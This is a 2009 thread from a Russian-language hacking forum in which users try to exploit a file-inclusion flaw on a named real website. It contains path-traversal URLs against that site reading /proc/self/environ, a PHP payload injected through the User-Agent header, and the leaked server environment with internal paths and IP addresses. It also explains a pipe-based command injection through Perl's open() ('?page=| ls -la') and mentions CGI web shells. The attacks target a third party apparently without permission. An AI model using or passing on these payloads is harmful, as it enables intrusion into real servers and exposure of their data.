HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 844 из 2422 « Первая < 344744794834 840 841 842 843 844 845 846 847 848 85489494413441844 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.08.2009, 11:27
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию
Цитата:
Сообщение от Tigger  
Задаюсь я этим вопросом уже не впервый раз =\
Я проинклюдил /proc/self/environ, но инклюдящий файл не PHP, a CGI. PHP команды, разумеется, не пашут, так что же можно сделать?


//Как я понял мне нужен аналог system'a на perl'e, но может я не прав.
все зависит от того на каком языке написана cgi
для перла
Цитата:
Perl's exec(), and system() functions as well as the backtick operator can be used to execute system commands.
так же не факт что они там вообще eval-ятся.
 
Ответить с цитированием

  #2  
Старый 17.08.2009, 11:38
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию
geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
 
Ответить с цитированием

  #3  
Старый 17.08.2009, 11:55
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию
Цитата:
Сообщение от Tigger  
geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
я не перл-программер.
бегло пробежался по гуглу.
и поспрошал на канале у знатоков.
Перл не страдает таким извращением как пхп, и без "особых условий"
LFI как в пхп, провести нельзя.
 
Ответить с цитированием

  #4  
Старый 17.08.2009, 17:29
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
Цитата:
Сообщение от Tigger  
geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
выполнение PERL-кода ты получишь только если переменная попадет в do или eval, но такого почти никогда не бывает. Если используется open то иногда можно выполнять системные команды или писать в файлы
в случае mailbrush в коде index.cgi было так:
Код:
open (PAGE, "< $page");
знак '<' обозначает открыть файл для чтения, то есть уязвимость - простая читалка файлов.
если бы было так:
Код:
open (PAGE, $page);
то тут уже можно выполнять команды, примерно так: ?page=| ls -la
знак конвеера - запустить команду, знак '>' - открыть для записи.
 
Ответить с цитированием

  #5  
Старый 17.08.2009, 16:13
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию
Есть инклюд
Код:
http://www.lauralee.com/index.cgi?page=../../../../../../../proc/self/environ%00
При подмене заголовка User-Agent, в сорсах
Цитата:
ASPSERVER=aspvw.ahp.ftl.affinity.com DOCUMENT_ROOT=/nfs/cust/1/04/06/560401/web GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_HOST=www.lauralee.com HTTP_USER_AGENT=<?php echo "hello";?> ICSPATH=/usr/local/affinity/etc/lib/mivavm/icsdata MvCONFIG_COMMERCE_AUTHNET=/usr/local/affinity/etc/lib/mivavm/authnet.so MvCONFIG_COMMERCE_AuthorizeNet=/usr/local/affinity/etc/lib/mivavm/authnet.so MvCONFIG_COMMERCE_CYBERCASH=/usr/local/affinity/etc/lib/mivavm/cybercash.so MvCONFIG_COMMERCE_GlobalCommerce=/usr/local/affinity/etc/lib/mivavm/globcomm.so MvCONFIG_COMMERCE_ICS2=/usr/local/affinity/etc/lib/mivavm/ics2.so MvCONFIG_COMMERCE_LINKPOINT=/usr/local/affinity/etc/lib/mivavm/linkpoint.so MvCONFIG_COMMERCE_Paradata=/usr/local/affinity/etc/lib/mivavm/paradata.so MvCONFIG_COMMERCE_PNTransact=/usr/local/affinity/etc/lib/mivavm/pnt.so MvCONFIG_DIR_BUILTIN=/usr/local/affinity/etc/lib/mivavm/builtin MvCONFIG_DIR_CA=/usr/local/affinity/etc/lib/mivavm/certs MvCONFIG_DIR_CRYPTO=/lib/libcrypto.so.2 MvCONFIG_DIR_OPENSSL=/lib/libssl.so.2 MvCONFIG_FLAGS_SECURITY=5 MvCONFIG_TIMEOUT_GLOBAL=600 PATH=/usr/bin:/bin:/usr/local/bin QUERY_STRING=page=../../../../../../../proc/self/environ%00 REMOTE_ADDR=79.124.220.206 REMOTE_PORT=2305 REQUEST_METHOD=GET REQUEST_URI=/index.cgi?page=../../../../../../../proc/self/environ%00 SCRIPT_FILENAME=/nfs/cust/1/04/06/560401/web/index.cgi SCRIPT_NAME=/index.cgi SERVER_ADDR=172.28.2.161 SERVER_ADMIN=webmaster@lauralee.com SERVER_NAME=www.lauralee.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE= SERVER_SOFTWARE=Apache REMOTE_HOST=79.124.220.206 CSF_CLUSTERNAME=web MvCONFIG_DIR_MIVA=/nfs/cust/1/04/06/560401/web MvCONFIG_DIR_DATA=/nfs/cust/1/04/06/560401/web/htsdata
Т.е. PHP-код не интерпретируется. Можно ли, и если да, то как, обойти это?
Последний раз редактировалось mailbrush; 17.08.2009 в 16:16..
 
Ответить с цитированием

  #6  
Старый 17.08.2009, 16:38
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
mailbrush

http://www.lauralee.com/index.cgi?page=./index.cgi%00

У меня с перлом хреново, но PHP код там точно исполняться не будет, можешь быть уверен

И инклуд тут тоже абсолютно непричём
Последний раз редактировалось jokester; 17.08.2009 в 16:41..
 
Ответить с цитированием

  #7  
Старый 17.08.2009, 17:09
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию
о_О, точно, спасибо Вообще как-то не обратил внимания на расширение .cgi.
ЗЫ: А предыдущий вопрос от Tigger'a был точно такой же
 
Ответить с цитированием

  #8  
Старый 17.08.2009, 17:12
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию
есть cgi шеллы
 
Ответить с цитированием

  #9  
Старый 17.08.2009, 17:34
cupper
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737

Репутация: 180


По умолчанию
какие атаки можно провести черех хедер запроса ? если его поля нефильтруються ?
 
Ответить с цитированием

  #10  
Старый 17.08.2009, 18:54
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию
Все те же, что и GET, POST методом.
Всё зависит от кода.
 
Ответить с цитированием
Ответ
Страница 844 из 2422 « Первая < 344744794834 840 841 842 843 844 845 846 847 848 85489494413441844 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.